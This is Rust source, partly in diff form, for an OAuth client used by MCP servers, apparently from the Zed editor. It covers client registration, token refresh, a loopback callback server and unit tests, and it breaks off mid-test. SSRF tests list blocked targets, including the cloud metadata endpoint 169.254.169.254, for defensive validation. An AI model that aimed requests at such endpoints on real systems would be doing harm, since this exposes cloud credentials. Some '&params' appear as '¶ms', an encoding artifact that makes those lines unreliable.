/// Perform Dynamic Client Registration with the authorization server.
///
/// POSTs the standard registration body (see [`dcr_registration_body`]) and
/// parses the returned client credentials.
///
/// # Errors
///
/// Fails when the endpoint URL fails SSRF validation, the request fails, the
/// server responds with a non-success status, or the response cannot be
/// parsed.
pub async fn perform_dcr(
    http_client: &Arc<dyn HttpClient>,
    registration_endpoint: &Url,
    redirect_uri: &str,
) -> Result<OAuthClientRegistration> {
    // SSRF guard: reject private/link-local addresses before issuing requests.
    validate_oauth_url(registration_endpoint)?;

    let body = dcr_registration_body(redirect_uri);
    let body_bytes = serde_json::to_vec(&body)?;

    let request = Request::builder()
        .method(http_client::http::Method::POST)
        .uri(registration_endpoint.as_str())
        .header("Content-Type", "application/json")
        .header("Accept", "application/json")
        .body(AsyncBody::from(body_bytes))?;

    let mut response = http_client.send(request).await?;

    if !response.status().is_success() {
        // Include the server's error body in the message for debuggability.
        let mut error_body = String::new();
        response.body_mut().read_to_string(&mut error_body).await?;
        bail!(
            "DCR failed with status {}: {}",
            response.status(),
            error_body
        );
    }

    let mut response_body = String::new();
    response
        .body_mut()
        .read_to_string(&mut response_body)
        .await?;

    let dcr_response: DcrResponse =
        serde_json::from_str(&response_body).context("failed to parse DCR response")?;

    Ok(OAuthClientRegistration {
        client_id: dcr_response.client_id,
        client_secret: dcr_response.client_secret,
    })
}
+
+// -- Token exchange and refresh (async) --------------------------------------
+
+/// Exchange an authorization code for tokens at the token endpoint.
+pub async fn exchange_code(
+ http_client: &Arc<dyn HttpClient>,
+ auth_server_metadata: &AuthServerMetadata,
+ code: &str,
+ client_id: &str,
+ redirect_uri: &str,
+ code_verifier: &str,
+ resource: &str,
+) -> Result<OAuthTokens> {
+ let params = token_exchange_params(code, client_id, redirect_uri, code_verifier, resource);
+ post_token_request(http_client, &auth_server_metadata.token_endpoint, ¶ms).await
+}
+
+/// Refresh tokens using a refresh token.
+pub async fn refresh_tokens(
+ http_client: &Arc<dyn HttpClient>,
+ token_endpoint: &Url,
+ refresh_token: &str,
+ client_id: &str,
+ resource: &str,
+) -> Result<OAuthTokens> {
+ let params = token_refresh_params(refresh_token, client_id, resource);
+ post_token_request(http_client, token_endpoint, ¶ms).await
+}
+
/// POST form-encoded parameters to a token endpoint and parse the response.
///
/// # Errors
///
/// Fails when the endpoint URL fails SSRF validation, the request fails, the
/// server responds with a non-success status, or the response body cannot be
/// parsed as a [`TokenResponse`].
async fn post_token_request(
    http_client: &Arc<dyn HttpClient>,
    token_endpoint: &Url,
    params: &[(&str, String)],
) -> Result<OAuthTokens> {
    // SSRF guard: reject private/link-local addresses before issuing requests.
    validate_oauth_url(token_endpoint)?;

    let body = url::form_urlencoded::Serializer::new(String::new())
        .extend_pairs(params.iter().map(|(k, v)| (*k, v.as_str())))
        .finish();

    let request = Request::builder()
        .method(http_client::http::Method::POST)
        .uri(token_endpoint.as_str())
        .header("Content-Type", "application/x-www-form-urlencoded")
        .header("Accept", "application/json")
        .body(AsyncBody::from(body.into_bytes()))?;

    let mut response = http_client.send(request).await?;

    if !response.status().is_success() {
        // Include the server's error body in the message for debuggability.
        let mut error_body = String::new();
        response.body_mut().read_to_string(&mut error_body).await?;
        bail!(
            "token request failed with status {}: {}",
            response.status(),
            error_body
        );
    }

    let mut response_body = String::new();
    response
        .body_mut()
        .read_to_string(&mut response_body)
        .await?;

    let token_response: TokenResponse =
        serde_json::from_str(&response_body).context("failed to parse token response")?;

    Ok(token_response.into_tokens())
}
+
+// -- Loopback HTTP callback server -------------------------------------------
+
/// An OAuth authorization callback received via the loopback HTTP server.
pub struct OAuthCallback {
    /// The one-time authorization code to exchange at the token endpoint.
    pub code: String,
    /// The opaque `state` value; callers must compare it against the value
    /// they sent to detect CSRF.
    pub state: String,
}

// Manual Debug impl: both fields are secrets during the window before the
// code is exchanged, so neither is allowed to appear in logs.
impl std::fmt::Debug for OAuthCallback {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("OAuthCallback")
            .field("code", &"[redacted]")
            .field("state", &"[redacted]")
            .finish()
    }
}
+
+impl OAuthCallback {
+ /// Parse the query string from a callback URL like
+ /// `http://127.0.0.1:<port>/callback?code=...&state=...`.
+ pub fn parse_query(query: &str) -> Result<Self> {
+ let mut code: Option<String> = None;
+ let mut state: Option<String> = None;
+ let mut error: Option<String> = None;
+ let mut error_description: Option<String> = None;
+
+ for (key, value) in url::form_urlencoded::parse(query.as_bytes()) {
+ match key.as_ref() {
+ "code" => {
+ if !value.is_empty() {
+ code = Some(value.into_owned());
+ }
+ }
+ "state" => {
+ if !value.is_empty() {
+ state = Some(value.into_owned());
+ }
+ }
+ "error" => {
+ if !value.is_empty() {
+ error = Some(value.into_owned());
+ }
+ }
+ "error_description" => {
+ if !value.is_empty() {
+ error_description = Some(value.into_owned());
+ }
+ }
+ _ => {}
+ }
+ }
+
+ // Check for OAuth error response (RFC 6749 Section 4.1.2.1) before
+ // checking for missing code/state.
+ if let Some(error_code) = error {
+ bail!(
+ "OAuth authorization failed: {} ({})",
+ error_code,
+ error_description.as_deref().unwrap_or("no description")
+ );
+ }
+
+ let code = code.ok_or_else(|| anyhow!("missing 'code' parameter in OAuth callback"))?;
+ let state = state.ok_or_else(|| anyhow!("missing 'state' parameter in OAuth callback"))?;
+
+ Ok(Self { code, state })
+ }
+}
+
/// How long to wait for the browser to complete the OAuth flow before giving
/// up and releasing the loopback port.
const CALLBACK_TIMEOUT: Duration = Duration::from_secs(2 * 60);

/// Start a loopback HTTP server to receive the OAuth authorization callback.
///
/// Binds to an ephemeral loopback port for each flow.
///
/// Returns `(redirect_uri, callback_future)`. The caller should use the
/// redirect URI in the authorization request, open the browser, then await
/// the future to receive the callback.
///
/// The server accepts exactly one request on `/callback`, validates that it
/// contains `code` and `state` query parameters, responds with a minimal
/// HTML page telling the user they can close the tab, and shuts down.
///
/// The callback server shuts down when the returned oneshot receiver is dropped
/// (e.g. because the authentication task was cancelled), or after a timeout
/// ([CALLBACK_TIMEOUT]).
pub async fn start_callback_server() -> Result<(
    String,
    futures::channel::oneshot::Receiver<Result<OAuthCallback>>,
)> {
    // Port 0 asks the OS for an ephemeral port; we read the real port back
    // from the bound address to build the redirect URI.
    let server = tiny_http::Server::http("127.0.0.1:0")
        .map_err(|e| anyhow!(e).context("Failed to bind loopback listener for OAuth callback"))?;
    let port = server
        .server_addr()
        .to_ip()
        .context("server not bound to a TCP address")?
        .port();

    let redirect_uri = format!("http://127.0.0.1:{}/callback", port);

    let (tx, rx) = futures::channel::oneshot::channel();

    // `tiny_http` is blocking, so we run it on a background thread.
    // The `recv_timeout` loop lets us check for cancellation (the receiver
    // being dropped) and enforce an overall timeout.
    std::thread::spawn(move || {
        let deadline = std::time::Instant::now() + CALLBACK_TIMEOUT;

        loop {
            // Receiver dropped => flow was cancelled; exit and free the port.
            if tx.is_canceled() {
                return;
            }
            let remaining = deadline.saturating_duration_since(std::time::Instant::now());
            if remaining.is_zero() {
                return;
            }

            // Short poll interval so cancellation is noticed promptly even
            // while blocked waiting for a connection.
            let timeout = remaining.min(Duration::from_millis(500));
            let Some(request) = (match server.recv_timeout(timeout) {
                Ok(req) => req,
                Err(_) => {
                    let _ = tx.send(Err(anyhow!("OAuth callback server I/O error")));
                    return;
                }
            }) else {
                // Timeout with no request — loop back and check cancellation.
                continue;
            };

            let result = handle_callback_request(&request);

            // Respond to the browser before forwarding the result, so the
            // user sees a page either way.
            let (status_code, body) = match &result {
                Ok(_) => (
                    200,
                    "<html><body><h1>Authorization successful</h1>\
                     <p>You can close this tab and return to Zed.</p></body></html>",
                ),
                Err(err) => {
                    log::error!("OAuth callback error: {}", err);
                    (
                        400,
                        "<html><body><h1>Authorization failed</h1>\
                         <p>Something went wrong. Please try again from Zed.</p></body></html>",
                    )
                }
            };

            let response = tiny_http::Response::from_string(body)
                .with_status_code(status_code)
                .with_header(
                    tiny_http::Header::from_str("Content-Type: text/html")
                        .expect("failed to construct response header"),
                )
                .with_header(
                    // Discourage the browser from keeping the connection open
                    // to a server that is about to shut down.
                    tiny_http::Header::from_str("Keep-Alive: timeout=0,max=0")
                        .expect("failed to construct response header"),
                );
            request.respond(response).log_err();

            let _ = tx.send(result);
            return;
        }
    });

    Ok((redirect_uri, rx))
}
+
+/// Extract the `code` and `state` query parameters from an OAuth callback
+/// request to `/callback`.
+fn handle_callback_request(request: &tiny_http::Request) -> Result<OAuthCallback> {
+ let url = Url::parse(&format!("http://localhost{}", request.url()))
+ .context("malformed callback request URL")?;
+
+ if url.path() != "/callback" {
+ bail!("unexpected path in OAuth callback: {}", url.path());
+ }
+
+ let query = url
+ .query()
+ .ok_or_else(|| anyhow!("OAuth callback has no query string"))?;
+ OAuthCallback::parse_query(query)
+}
+
+// -- JSON fetch helper -------------------------------------------------------
+
+async fn fetch_json<T: serde::de::DeserializeOwned>(
+ http_client: &Arc<dyn HttpClient>,
+ url: &Url,
+) -> Result<T> {
+ validate_oauth_url(url)?;
+
+ let request = Request::builder()
+ .method(http_client::http::Method::GET)
+ .uri(url.as_str())
+ .header("Accept", "application/json")
+ .body(AsyncBody::default())?;
+
+ let mut response = http_client.send(request).await?;
+
+ if !response.status().is_success() {
+ bail!("HTTP {} fetching {}", response.status(), url);
+ }
+
+ let mut body = String::new();
+ response.body_mut().read_to_string(&mut body).await?;
+ serde_json::from_str(&body).with_context(|| format!("failed to parse JSON from {}", url))
+}
+
+// -- Serde response types for discovery --------------------------------------
+
/// Wire format of an RFC 9728 Protected Resource Metadata document. Every
/// field is optional/defaulted so lenient servers still parse; semantic
/// validation happens in [`fetch_protected_resource_metadata`].
#[derive(Debug, Deserialize)]
struct ProtectedResourceMetadataResponse {
    #[serde(default)]
    resource: Option<Url>,
    #[serde(default)]
    authorization_servers: Vec<Url>,
    #[serde(default)]
    scopes_supported: Option<Vec<String>>,
}

/// Wire format of an RFC 8414 / OIDC Discovery metadata document. Required
/// fields are enforced in [`fetch_auth_server_metadata`], not here.
#[derive(Debug, Deserialize)]
struct AuthServerMetadataResponse {
    #[serde(default)]
    issuer: Option<Url>,
    #[serde(default)]
    authorization_endpoint: Option<Url>,
    #[serde(default)]
    token_endpoint: Option<Url>,
    #[serde(default)]
    registration_endpoint: Option<Url>,
    #[serde(default)]
    scopes_supported: Option<Vec<String>>,
    #[serde(default)]
    code_challenge_methods_supported: Option<Vec<String>>,
    #[serde(default)]
    client_id_metadata_document_supported: Option<bool>,
}

/// Wire format of an RFC 7591 Dynamic Client Registration response; only the
/// credentials we use are modeled.
#[derive(Debug, Deserialize)]
struct DcrResponse {
    client_id: String,
    #[serde(default)]
    client_secret: Option<String>,
}
+
/// Provides OAuth tokens to the HTTP transport layer.
///
/// The transport calls `access_token()` before each request. On a 401 response
/// it calls `try_refresh()` and retries once if the refresh succeeds.
#[async_trait]
pub trait OAuthTokenProvider: Send + Sync {
    /// Returns the current access token, if one is available.
    fn access_token(&self) -> Option<String>;

    /// Attempts to refresh the access token. Returns `true` if a new token was
    /// obtained and the request should be retried.
    ///
    /// An `Err` signals an unrecoverable refresh failure; `Ok(false)` means
    /// refresh was not possible (e.g. no refresh token) or did not succeed.
    async fn try_refresh(&self) -> Result<bool>;
}
+
/// Concrete `OAuthTokenProvider` backed by a full persisted OAuth session and
/// an HTTP client for token refresh. The same provider type is used both after
/// an interactive authentication flow and when restoring a saved session from
/// the keychain on startup.
pub struct McpOAuthTokenProvider {
    // Mutex-guarded because the transport may call access_token/try_refresh
    // while a refresh replaces the session's tokens.
    session: SyncMutex<OAuthSession>,
    http_client: Arc<dyn HttpClient>,
    // When present, every refreshed session is forwarded here so it can be
    // re-persisted (e.g. written back to the keychain).
    token_refresh_tx: Option<mpsc::UnboundedSender<OAuthSession>>,
}
+
+impl McpOAuthTokenProvider {
+ pub fn new(
+ session: OAuthSession,
+ http_client: Arc<dyn HttpClient>,
+ token_refresh_tx: Option<mpsc::UnboundedSender<OAuthSession>>,
+ ) -> Self {
+ Self {
+ session: SyncMutex::new(session),
+ http_client,
+ token_refresh_tx,
+ }
+ }
+
+ fn access_token_is_expired(tokens: &OAuthTokens) -> bool {
+ tokens.expires_at.is_some_and(|expires_at| {
+ SystemTime::now()
+ .checked_add(Duration::from_secs(30))
+ .is_some_and(|now_with_buffer| expires_at <= now_with_buffer)
+ })
+ }
+}
+
#[async_trait]
impl OAuthTokenProvider for McpOAuthTokenProvider {
    // Returns None for an expired token so the transport triggers a refresh
    // instead of sending a request that is guaranteed a 401.
    fn access_token(&self) -> Option<String> {
        let session = self.session.lock();
        if Self::access_token_is_expired(&session.tokens) {
            return None;
        }
        Some(session.tokens.access_token.clone())
    }

    async fn try_refresh(&self) -> Result<bool> {
        // Clone everything we need out of the session first so the lock is
        // not held across the network await below.
        let (refresh_token, token_endpoint, resource, client_id) = {
            let session = self.session.lock();
            match session.tokens.refresh_token.clone() {
                Some(refresh_token) => (
                    refresh_token,
                    session.token_endpoint.clone(),
                    session.resource.clone(),
                    session.client_registration.client_id.clone(),
                ),
                // No refresh token: refresh is impossible, but not an error.
                None => return Ok(false),
            }
        };

        let resource_str = canonical_server_uri(&resource);

        match refresh_tokens(
            &self.http_client,
            &token_endpoint,
            &refresh_token,
            &client_id,
            &resource_str,
        )
        .await
        {
            Ok(mut new_tokens) => {
                // Servers may omit the refresh token on rotation; keep the
                // old one so future refreshes remain possible.
                if new_tokens.refresh_token.is_none() {
                    new_tokens.refresh_token = Some(refresh_token);
                }

                {
                    let mut session = self.session.lock();
                    session.tokens = new_tokens;

                    // Forward the updated session for re-persistence; a closed
                    // channel is ignored (best-effort).
                    if let Some(ref tx) = self.token_refresh_tx {
                        tx.unbounded_send(session.clone()).ok();
                    }
                }

                Ok(true)
            }
            // Refresh failure is reported as "no new token" rather than a hard
            // error so the caller can fall back to re-authentication.
            Err(err) => {
                log::warn!("OAuth token refresh failed: {}", err);
                Ok(false)
            }
        }
    }
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use http_client::Response;
+
+ // -- require_https_or_loopback tests ------------------------------------
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_https() {
+ let url = Url::parse("https://auth.example.com/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_rejects_http_remote() {
+ let url = Url::parse("http://auth.example.com/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_err());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_127_0_0_1() {
+ let url = Url::parse("http://127.0.0.1:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_ipv6_loopback() {
+ let url = Url::parse("http://[::1]:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_localhost() {
+ let url = Url::parse("http://localhost:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_localhost_case_insensitive() {
+ let url = Url::parse("http://LOCALHOST:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_rejects_http_non_loopback_ip() {
+ let url = Url::parse("http://192.168.1.1:8080/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_err());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_rejects_ftp() {
+ let url = Url::parse("ftp://auth.example.com/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_err());
+ }
+
+    // -- validate_oauth_url (SSRF) tests ------------------------------------
+    // validate_oauth_url must reject literal-IP hosts in private, link-local,
+    // ULA, and unspecified ranges (including IPv4-mapped IPv6 forms), while
+    // allowing public hosts and the loopback callback server.
+
+    #[test]
+    fn test_validate_oauth_url_accepts_https_public() {
+        let url = Url::parse("https://auth.example.com/token").unwrap();
+        assert!(validate_oauth_url(&url).is_ok());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_private_ipv4_10() {
+        let url = Url::parse("https://10.0.0.1/token").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_private_ipv4_172() {
+        let url = Url::parse("https://172.16.0.1/token").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_private_ipv4_192() {
+        let url = Url::parse("https://192.168.1.1/token").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_link_local() {
+        // 169.254.169.254 is the classic cloud metadata-service SSRF target.
+        let url = Url::parse("https://169.254.169.254/latest/meta-data/").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_ipv6_ula() {
+        let url = Url::parse("https://[fd12:3456:789a::1]/token").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_ipv6_unspecified() {
+        let url = Url::parse("https://[::]/token").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_ipv4_mapped_ipv6_private() {
+        // IPv4-mapped IPv6 must not bypass the IPv4 private-range checks.
+        let url = Url::parse("https://[::ffff:10.0.0.1]/token").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_rejects_ipv4_mapped_ipv6_link_local() {
+        let url = Url::parse("https://[::ffff:169.254.169.254]/token").unwrap();
+        assert!(validate_oauth_url(&url).is_err());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_allows_http_loopback() {
+        // Loopback is permitted (it's our callback server).
+        let url = Url::parse("http://127.0.0.1:8080/callback").unwrap();
+        assert!(validate_oauth_url(&url).is_ok());
+    }
+
+    #[test]
+    fn test_validate_oauth_url_allows_https_public_ip() {
+        // A public literal IP is acceptable; only restricted ranges are blocked.
+        let url = Url::parse("https://93.184.216.34/token").unwrap();
+        assert!(validate_oauth_url(&url).is_ok());
+    }
+
+    // -- parse_www_authenticate tests ----------------------------------------
+    // Covers the Bearer challenge grammar: quoted parameters
+    // (resource_metadata, scope, error, error_description), space-separated
+    // scope lists, known/unknown error codes, scheme case-insensitivity, and
+    // rejection of non-Bearer schemes.
+
+    #[test]
+    fn test_parse_www_authenticate_with_resource_metadata_and_scope() {
+        let header = r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource", scope="files:read user:profile""#;
+        let result = parse_www_authenticate(header).unwrap();
+
+        assert_eq!(
+            result.resource_metadata.as_ref().map(|u| u.as_str()),
+            Some("https://mcp.example.com/.well-known/oauth-protected-resource")
+        );
+        // The quoted scope string is split on whitespace into individual scopes.
+        assert_eq!(
+            result.scope,
+            Some(vec!["files:read".to_string(), "user:profile".to_string()])
+        );
+        assert_eq!(result.error, None);
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_resource_metadata_only() {
+        let header = r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource""#;
+        let result = parse_www_authenticate(header).unwrap();
+
+        assert_eq!(
+            result.resource_metadata.as_ref().map(|u| u.as_str()),
+            Some("https://mcp.example.com/.well-known/oauth-protected-resource")
+        );
+        assert_eq!(result.scope, None);
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_bare_bearer() {
+        // A challenge with no parameters at all is still valid.
+        let result = parse_www_authenticate("Bearer").unwrap();
+        assert_eq!(result.resource_metadata, None);
+        assert_eq!(result.scope, None);
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_with_error() {
+        // Parameter order is arbitrary; all four parameters must be picked up.
+        let header = r#"Bearer error="insufficient_scope", scope="files:read files:write", resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource", error_description="Additional file write permission required""#;
+        let result = parse_www_authenticate(header).unwrap();
+
+        assert_eq!(result.error, Some(BearerError::InsufficientScope));
+        assert_eq!(
+            result.error_description.as_deref(),
+            Some("Additional file write permission required")
+        );
+        assert_eq!(
+            result.scope,
+            Some(vec!["files:read".to_string(), "files:write".to_string()])
+        );
+        assert!(result.resource_metadata.is_some());
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_invalid_token_error() {
+        let header =
+            r#"Bearer error="invalid_token", error_description="The access token expired""#;
+        let result = parse_www_authenticate(header).unwrap();
+        assert_eq!(result.error, Some(BearerError::InvalidToken));
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_invalid_request_error() {
+        let header = r#"Bearer error="invalid_request""#;
+        let result = parse_www_authenticate(header).unwrap();
+        assert_eq!(result.error, Some(BearerError::InvalidRequest));
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_unknown_error() {
+        // Unrecognized error codes map to the catch-all variant rather than
+        // failing the parse.
+        let header = r#"Bearer error="some_future_error""#;
+        let result = parse_www_authenticate(header).unwrap();
+        assert_eq!(result.error, Some(BearerError::Other));
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_rejects_non_bearer() {
+        let result = parse_www_authenticate("Basic realm=\"example\"");
+        assert!(result.is_err());
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_case_insensitive_scheme() {
+        let header = r#"bearer resource_metadata="https://example.com/.well-known/oauth-protected-resource""#;
+        let result = parse_www_authenticate(header).unwrap();
+        assert!(result.resource_metadata.is_some());
+    }
+
+    #[test]
+    fn test_parse_www_authenticate_multiline_style() {
+        // Some servers emit the header spread across multiple lines joined by
+        // whitespace, as shown in the spec examples.
+        let header = "Bearer resource_metadata=\"https://mcp.example.com/.well-known/oauth-protected-resource\",\n scope=\"files:read\"";
+        let result = parse_www_authenticate(header).unwrap();
+        assert!(result.resource_metadata.is_some());
+        assert_eq!(result.scope, Some(vec!["files:read".to_string()]));
+    }
+
+    // -- Well-known metadata URL construction tests --------------------------
+    // For path-bearing server URLs, the well-known segment is inserted between
+    // the origin and the path, and that candidate is tried before the bare
+    // origin fallback.
+    #[test]
+    fn test_protected_resource_metadata_urls_with_path() {
+        let server_url = Url::parse("https://api.example.com/v1/mcp").unwrap();
+        let urls = protected_resource_metadata_urls(&server_url);
+
+        assert_eq!(urls.len(), 2);
+        // Path-aware candidate first …
+        assert_eq!(
+            urls[0].as_str(),
+            "https://api.example.com/.well-known/oauth-protected-resource/v1/mcp"
+        );
+        // … then the root fallback.
+        assert_eq!(
+            urls[1].as_str(),
+            "https://api.example.com/.well-known/oauth-protected-resource"
+        );
+    }
+
+    #[test]
+    fn test_protected_resource_metadata_urls_without_path() {
+        // No path component ⇒ only the root well-known URL is produced.
+        let server_url = Url::parse("https://mcp.example.com").unwrap();
+        let urls = protected_resource_metadata_urls(&server_url);
+
+        assert_eq!(urls.len(), 1);
+        assert_eq!(
+            urls[0].as_str(),
+            "https://mcp.example.com/.well-known/oauth-protected-resource"
+        );
+    }
+
+    #[test]
+    fn test_auth_server_metadata_urls_with_path() {
+        let issuer = Url::parse("https://auth.example.com/tenant1").unwrap();
+        let urls = auth_server_metadata_urls(&issuer);
+
+        // Three candidates: OAuth metadata (path-inserted), OIDC metadata
+        // (path-inserted), and the legacy OIDC form with the path first.
+        assert_eq!(urls.len(), 3);
+        assert_eq!(
+            urls[0].as_str(),
+            "https://auth.example.com/.well-known/oauth-authorization-server/tenant1"
+        );
+        assert_eq!(
+            urls[1].as_str(),
+            "https://auth.example.com/.well-known/openid-configuration/tenant1"
+        );
+        assert_eq!(
+            urls[2].as_str(),
+            "https://auth.example.com/tenant1/.well-known/openid-configuration"
+        );
+    }
+
+    #[test]
+    fn test_auth_server_metadata_urls_without_path() {
+        let issuer = Url::parse("https://auth.example.com").unwrap();
+        let urls = auth_server_metadata_urls(&issuer);
+
+        assert_eq!(urls.len(), 2);
+        assert_eq!(
+            urls[0].as_str(),
+            "https://auth.example.com/.well-known/oauth-authorization-server"
+        );
+        assert_eq!(
+            urls[1].as_str(),
+            "https://auth.example.com/.well-known/openid-configuration"
+        );
+    }
+
+    // -- Canonical server URI tests ------------------------------------------
+    // canonical_server_uri lowercases scheme and host, keeps an explicit port,
+    // preserves path case, and drops a bare trailing slash.
+
+    #[test]
+    fn test_canonical_server_uri_simple() {
+        let url = Url::parse("https://mcp.example.com").unwrap();
+        assert_eq!(canonical_server_uri(&url), "https://mcp.example.com");
+    }
+
+    #[test]
+    fn test_canonical_server_uri_with_path() {
+        let url = Url::parse("https://mcp.example.com/v1/mcp").unwrap();
+        assert_eq!(canonical_server_uri(&url), "https://mcp.example.com/v1/mcp");
+    }
+
+    #[test]
+    fn test_canonical_server_uri_strips_trailing_slash() {
+        let url = Url::parse("https://mcp.example.com/").unwrap();
+        assert_eq!(canonical_server_uri(&url), "https://mcp.example.com");
+    }
+
+    #[test]
+    fn test_canonical_server_uri_preserves_port() {
+        let url = Url::parse("https://mcp.example.com:8443").unwrap();
+        assert_eq!(canonical_server_uri(&url), "https://mcp.example.com:8443");
+    }
+
+    #[test]
+    fn test_canonical_server_uri_lowercases() {
+        // Scheme and host are case-insensitive and get lowercased; the path is
+        // case-sensitive and must be preserved as-is.
+        let url = Url::parse("HTTPS://MCP.Example.COM/Server/MCP").unwrap();
+        assert_eq!(
+            canonical_server_uri(&url),
+            "https://mcp.example.com/Server/MCP"
+        );
+    }
+
+    // -- Scope selection tests -----------------------------------------------
+    // Scope precedence: the WWW-Authenticate challenge's scope wins; otherwise
+    // fall back to the resource metadata's scopes_supported; otherwise empty.
+
+    #[test]
+    fn test_select_scopes_prefers_www_authenticate() {
+        let www_auth = WwwAuthenticate {
+            resource_metadata: None,
+            scope: Some(vec!["files:read".into()]),
+            error: None,
+            error_description: None,
+        };
+        let resource_meta = ProtectedResourceMetadata {
+            resource: Url::parse("https://example.com").unwrap(),
+            authorization_servers: vec![],
+            scopes_supported: Some(vec!["files:read".into(), "files:write".into()]),
+        };
+        // Challenge scope takes precedence even when metadata offers more.
+        assert_eq!(select_scopes(&www_auth, &resource_meta), vec!["files:read"]);
+    }
+
+    #[test]
+    fn test_select_scopes_falls_back_to_resource_metadata() {
+        let www_auth = WwwAuthenticate {
+            resource_metadata: None,
+            scope: None,
+            error: None,
+            error_description: None,
+        };
+        let resource_meta = ProtectedResourceMetadata {
+            resource: Url::parse("https://example.com").unwrap(),
+            authorization_servers: vec![],
+            scopes_supported: Some(vec!["admin".into()]),
+        };
+        assert_eq!(select_scopes(&www_auth, &resource_meta), vec!["admin"]);
+    }
+
+    #[test]
+    fn test_select_scopes_empty_when_nothing_available() {
+        let www_auth = WwwAuthenticate {
+            resource_metadata: None,
+            scope: None,
+            error: None,
+            error_description: None,
+        };
+        let resource_meta = ProtectedResourceMetadata {
+            resource: Url::parse("https://example.com").unwrap(),
+            authorization_servers: vec![],
+            scopes_supported: None,
+        };
+        assert!(select_scopes(&www_auth, &resource_meta).is_empty());
+    }
+
+    // -- Client registration strategy tests ----------------------------------
+    // Strategy precedence: CIMD (URL-as-client-id) when the server advertises
+    // support, else Dynamic Client Registration when a registration endpoint
+    // exists, else Unavailable.
+
+    #[test]
+    fn test_registration_strategy_prefers_cimd() {
+        let metadata = AuthServerMetadata {
+            issuer: Url::parse("https://auth.example.com").unwrap(),
+            authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+            token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+            registration_endpoint: Some(Url::parse("https://auth.example.com/register").unwrap()),
+            scopes_supported: None,
+            code_challenge_methods_supported: Some(vec!["S256".into()]),
+            client_id_metadata_document_supported: true,
+        };
+        // CIMD wins even though a registration endpoint is also present.
+        assert_eq!(
+            determine_registration_strategy(&metadata),
+            ClientRegistrationStrategy::Cimd {
+                client_id: CIMD_URL.to_string(),
+            }
+        );
+    }
+
+    #[test]
+    fn test_registration_strategy_falls_back_to_dcr() {
+        let reg_endpoint = Url::parse("https://auth.example.com/register").unwrap();
+        let metadata = AuthServerMetadata {
+            issuer: Url::parse("https://auth.example.com").unwrap(),
+            authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+            token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+            registration_endpoint: Some(reg_endpoint.clone()),
+            scopes_supported: None,
+            code_challenge_methods_supported: Some(vec!["S256".into()]),
+            client_id_metadata_document_supported: false,
+        };
+        assert_eq!(
+            determine_registration_strategy(&metadata),
+            ClientRegistrationStrategy::Dcr {
+                registration_endpoint: reg_endpoint,
+            }
+        );
+    }
+
+    #[test]
+    fn test_registration_strategy_unavailable() {
+        let metadata = AuthServerMetadata {
+            issuer: Url::parse("https://auth.example.com").unwrap(),
+            authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+            token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+            registration_endpoint: None,
+            scopes_supported: None,
+            code_challenge_methods_supported: Some(vec!["S256".into()]),
+            client_id_metadata_document_supported: false,
+        };
+        assert_eq!(
+            determine_registration_strategy(&metadata),
+            ClientRegistrationStrategy::Unavailable,
+        );
+    }
+
+    // -- PKCE tests ----------------------------------------------------------
+    // generate_pkce_challenge must produce a base64url (no padding) verifier
+    // and an S256 challenge derived from it, fresh on every call.
+
+    #[test]
+    fn test_pkce_challenge_verifier_length() {
+        let pkce = generate_pkce_challenge();
+        // 32 random bytes → 43 base64url chars (no padding).
+        assert_eq!(pkce.verifier.len(), 43);
+    }
+
+    #[test]
+    fn test_pkce_challenge_is_valid_base64url() {
+        let pkce = generate_pkce_challenge();
+        // base64url alphabet: A–Z a–z 0–9 '-' '_'; '+' '/' '=' must not appear.
+        for c in pkce.verifier.chars().chain(pkce.challenge.chars()) {
+            assert!(
